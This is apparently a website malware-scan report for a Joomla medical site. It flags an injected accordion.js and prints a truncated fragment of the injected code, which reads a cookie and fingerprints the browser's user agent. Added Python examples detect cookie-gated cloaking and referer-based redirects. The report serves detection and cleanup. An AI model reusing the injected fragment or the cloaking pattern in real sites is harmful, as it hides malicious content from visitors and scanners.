Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mgrmmedicare.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mgrmmedicare.com/
Result: The website is marked by Yandex as suspicious: visiting this web site may harm your computer.
Scanned pages/files
Request | Server response | Status |
http://mgrmmedicare.com/ | 200 OK Content-Length: 45997 Content-Type: text/html | clean |
http://mgrmmedicare.com/templates/yoo_pure/js/jquery.js | 200 OK Content-Length: 57272 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/templates/yoo_pure/js/animatedcollapse.js | 200 OK Content-Length: 11611 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/templates/yoo_pure/js/accordion.js | 200 OK Content-Length: 16600 Content-Type: application/javascript | malicious |
Malicious code (confirmed by antiviruses, see below). The scanner prints only the head and the tail of the file: the excerpt opens with the injected code, which reads a cookie and checks navigator.userAgent before doing anything, and closes with the tail of the legitimate YUI accordion library (YAHOO.register). The scanner output is cut off inside the injected function.

```javascript
function getCookie(name) {
  var matches = document.cookie.match(new RegExp(
    "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
  ));
  return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Replacecountermine() {
  var parover = navigator.userAgent;
  var httpacc = (parover.indexOf("IEMobile") > -1 || parover.indexOf("Chrome") > -1 || parover.indexOf("Windows") < +1);
  var ru = (getCookie("rightmools") === u
  // scanner output is truncated here; the rest of the injected function is not shown in the report
        }
      }
    };
    obj.remove = function ( el ) {
      var item, list;
      if (item = _getItem(el)) {
        if (list = _getList (item)) {
          return _removeItem (item, list);
        }
      }
    };
    return obj;
  }();
})();
YAHOO.register("accordion", YAHOO.widget.AccordionManager, {version: "1.5.0", build: "203"});
```

Antivirus reports:
http://mgrmmedicare.com/templates/yoo_pure/js/utilities.js | 200 OK Content-Length: 106278 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/templates/yoo_pure/js/bubbling.js | 200 OK Content-Length: 12188 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/plugins/system/jcemediabox/js/mediaobject.js?v=105 | 200 OK Content-Length: 2850 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/plugins/system/jcemediabox/js/jcemediabox.js?v=105 | 200 OK Content-Length: 40741 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/plugins/system/jcemediabox/addons/default.js?v=105 | 200 OK Content-Length: 1439 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/plugins/system/jcemediabox/addons/twitter.js?v=105 | 200 OK Content-Length: 461 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/media/system/js/caption.js | 200 OK Content-Length: 1779 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/templates/yoo_pure/warp/systems/joomla.1.5/js/warp.js | 200 OK Content-Length: 1555 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/templates/yoo_pure/warp/systems/joomla.1.5/js/accordionmenu.js | 200 OK Content-Length: 1216 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/templates/yoo_pure/warp/systems/joomla.1.5/js/menu.js | 200 OK Content-Length: 3951 Content-Type: application/javascript | clean |
http://mgrmmedicare.com/templates/yoo_pure/warp/systems/joomla.1.5/js/fancymenu.js | 200 OK Content-Length: 3124 Content-Type: application/javascript | clean |
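The accordion.js excerpt reads a cookie and fingerprints navigator.userAgent before it does anything, which is the usual shape of an injection that fires only once per victim and only for selected browsers. The following is an added example, not part of the scanner's output and not code from the site or the template vendor: a small Python checker that flags that shape in a tree of template JavaScript files and, where the hash of a pristine copy is known, verifies file integrity. The indicator names, the regular expressions, the known-good hash handling and the sample inputs are assumptions made for this example; the suspect sample is the excerpt as printed in the report, with the part the scanner did not show left out.

```python
import hashlib
import re

# Heuristic indicators of a conditionally-firing injection in a JavaScript file.
# Names and patterns are assumptions for this example, chosen to match the shape
# of the accordion.js excerpt: read a cookie, fingerprint navigator.userAgent,
# and only then act on the page.
INDICATORS = {
    "reads_cookie": re.compile(r"document\.cookie\.match\s*\(|getCookie\s*\("),
    "sets_cookie": re.compile(r"document\.cookie\s*=(?!=)"),
    "ua_fingerprint": re.compile(r"navigator\.userAgent"),
    "ua_string_check": re.compile(
        r"""indexOf\(\s*["'](?:IEMobile|Chrome|Windows|MSIE|Android|iPhone)["']\s*\)"""
    ),
    "runtime_injection": re.compile(
        r"""document\.write\s*\(|createElement\s*\(\s*["'](?:script|iframe)["']"""
    ),
}


def find_indicators(js):
    """Return {indicator_name: bool} for one JavaScript source text."""
    return {name: bool(rx.search(js)) for name, rx in INDICATORS.items()}


def classify(js):
    """Verdict string for one file, based on which indicators co-occur."""
    hits = find_indicators(js)
    gated = hits["reads_cookie"] or hits["sets_cookie"]
    if hits["ua_fingerprint"] and gated:
        return "suspicious: cookie-gated user-agent cloaking"
    if hits["ua_fingerprint"] and hits["runtime_injection"]:
        return "suspicious: user-agent-conditional injection"
    return "no cloaking indicators"


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def matches_known_good(js, expected_sha256_hex):
    """Integrity check against the hash of a pristine copy of the same file
    (for a Joomla template, the file from the vendor's release archive)."""
    return sha256_hex(js.encode("utf-8")) == expected_sha256_hex


def scan_files(files):
    """files: {path: js_text}. Returns {path: verdict} for every file handed in."""
    return {path: classify(text) for path, text in files.items()}


# Constructed sample inputs. SUSPECT_JS is the accordion.js excerpt as printed in
# the report, with the part the scanner did not show left out; CLEAN_JS is a
# stand-in for an unmodified library file.
SUSPECT_JS = r'''function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; }
function Replacecountermine() { var parover = navigator.userAgent; var httpacc = (parover.indexOf("IEMobile") > -1 || parover.indexOf("Chrome") > -1 || parover.indexOf("Windows") < +1); var ru = (getCookie("rightmools") === u
YAHOO.register("accordion", YAHOO.widget.AccordionManager, {version: "1.5.0", build: "203"});'''

CLEAN_JS = r'''(function ($) { $.fn.collapse = function () { return this.each(function () { $(this).hide(); }); }; })(jQuery);'''


if __name__ == "__main__":
    results = scan_files({"accordion.js": SUSPECT_JS, "collapse.js": CLEAN_JS})
    for path, verdict in results.items():
        print(f"{path}: {verdict}")
```

The heuristics alone are not a verdict: older jQuery releases and several Joomla plugins legitimately read navigator.userAgent, so a hit should be confirmed by comparing the file with the vendor's copy (matches_known_good above) or by diffing against a clean backup. Run it over the templates/ and plugins/ trees, not just the files the scanner happened to fetch from the front page.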
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mgrmmedicare.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 04 Sep 2014 23:07:23 GMT
Server: Apache mod_fcgid/2.3.10-dev
Content-Length: 45997
Content-Type: text/html
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 3fd6bb4d92a42aaeac9a1d099ad3c519=5ee34ed7ad3cbc51d5ea7ae09ee2d880; path=/
X-Powered-By: PHP/5.4.31
...45997 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mgrmmedicare.com
Referer: http://www.google.com/search?q=mgrmmedicare.com
Result:
The response matches the first query (200 OK, same Content-Length, no Location header); no suspicious redirects were found.
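The two queries above are the standard check for referer-based cloaking: fetch the same URL once directly and once with a search-engine Referer, then look for a 30x, a meta refresh or a JavaScript redirect that appears only in the second response. Below is an added example of that check in Python, written for this page rather than taken from the scanner or the site. The header values, the redirect regular expressions and the constructed responses are assumptions; the two clean responses mirror the report's result (both 200 OK with a 45997-byte body), while the two cloaked ones show what the comparison reports when a search-engine visitor is redirected.

```python
import hashlib
import re
import urllib.error
import urllib.request

# Request conditions to vary for the same URL. Header values are assumptions for
# this example; the Referer is the one the report used for its second query.
CONDITIONS = {
    "direct": {},
    "from_google": {"Referer": "http://www.google.com/search?q=mgrmmedicare.com"},
    "mobile": {"User-Agent": "Mozilla/5.0 (Linux; Android 4.4; Nexus 5) "
                             "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0 Mobile Safari/537.36"},
}

# Client-side redirect markers to look for in a body that differs from the baseline.
META_REFRESH = re.compile(rb"<meta[^>]+http-equiv\s*=\s*[\"']?refresh", re.I)
JS_REDIRECT = re.compile(rb"(?:window\.|top\.|self\.)?location(?:\.href)?\s*=\s*[\"']https?://", re.I)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following 30x responses so the Location header is observable."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch(url, extra_headers):
    """Fetch one URL under one set of headers; returns {status, headers, body}."""
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0", **extra_headers})
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=15) as resp:
            return {"status": resp.status, "headers": dict(resp.headers), "body": resp.read()}
    except urllib.error.HTTPError as err:  # unfollowed 30x and 4xx/5xx land here
        return {"status": err.code, "headers": dict(err.headers), "body": err.read()}


def compare(baseline, conditioned):
    """Cloaking-relevant differences between a baseline response and one fetched
    under another condition. Returns a list of finding strings (empty = no change)."""
    findings = []
    base_h = {k.lower(): v for k, v in baseline["headers"].items()}
    cond_h = {k.lower(): v for k, v in conditioned["headers"].items()}
    if conditioned["status"] != baseline["status"]:
        findings.append(f"status {baseline['status']} -> {conditioned['status']}")
    if cond_h.get("location") and cond_h.get("location") != base_h.get("location"):
        findings.append(f"HTTP redirect to {cond_h['location']}")
    if hashlib.sha256(conditioned["body"]).digest() != hashlib.sha256(baseline["body"]).digest():
        delta = len(conditioned["body"]) - len(baseline["body"])
        findings.append(f"body differs ({delta:+d} bytes)")
        for label, rx in (("meta refresh", META_REFRESH), ("JavaScript location redirect", JS_REDIRECT)):
            if rx.search(conditioned["body"]) and not rx.search(baseline["body"]):
                findings.append(f"{label} present only under this condition")
    return findings


def check_site(url, conditions=CONDITIONS):
    """Live check: fetch url under every condition and compare each with the direct visit."""
    baseline = fetch(url, conditions["direct"])
    return {name: compare(baseline, fetch(url, hdrs))
            for name, hdrs in conditions.items() if name != "direct"}


# Constructed responses. DIRECT and FROM_GOOGLE_CLEAN model the report's result: the
# same 45997-byte page for both visits. FROM_GOOGLE_302 and FROM_GOOGLE_JS model what
# a cloaked site might return to a search-engine visitor (example.invalid is a placeholder).
PAGE = b"<html><body>" + b"x" * 45971 + b"</body></html>"  # 45997 bytes, like the report
DIRECT = {"status": 200, "headers": {"Content-Type": "text/html", "Content-Length": "45997"}, "body": PAGE}
FROM_GOOGLE_CLEAN = {"status": 200, "headers": {"Content-Type": "text/html", "Content-Length": "45997"}, "body": PAGE}
FROM_GOOGLE_302 = {"status": 302, "headers": {"Location": "http://example.invalid/landing"}, "body": b""}
FROM_GOOGLE_JS = {"status": 200, "headers": {"Content-Type": "text/html"},
                  "body": b'<html><script>window.location.href = "http://example.invalid/landing";</script></html>'}


if __name__ == "__main__":
    # Offline demonstration on the constructed responses; for a live check use
    # check_site("http://mgrmmedicare.com/").
    print("clean:", compare(DIRECT, FROM_GOOGLE_CLEAN))
    print("302:  ", compare(DIRECT, FROM_GOOGLE_302))
    print("js:   ", compare(DIRECT, FROM_GOOGLE_JS))
```

Two caveats when running this against a live site. A dynamic page can differ between two fetches for innocent reasons (timestamps, nonces, rotating banners), so a bare "body differs" finding needs a diff before it counts; only the status, Location and redirect-marker findings are strong on their own. And redirect code often keys on the visitor's IP or geolocation as well as the Referer, so a clean result from one scanner vantage point, as in the report above, does not rule cloaking out.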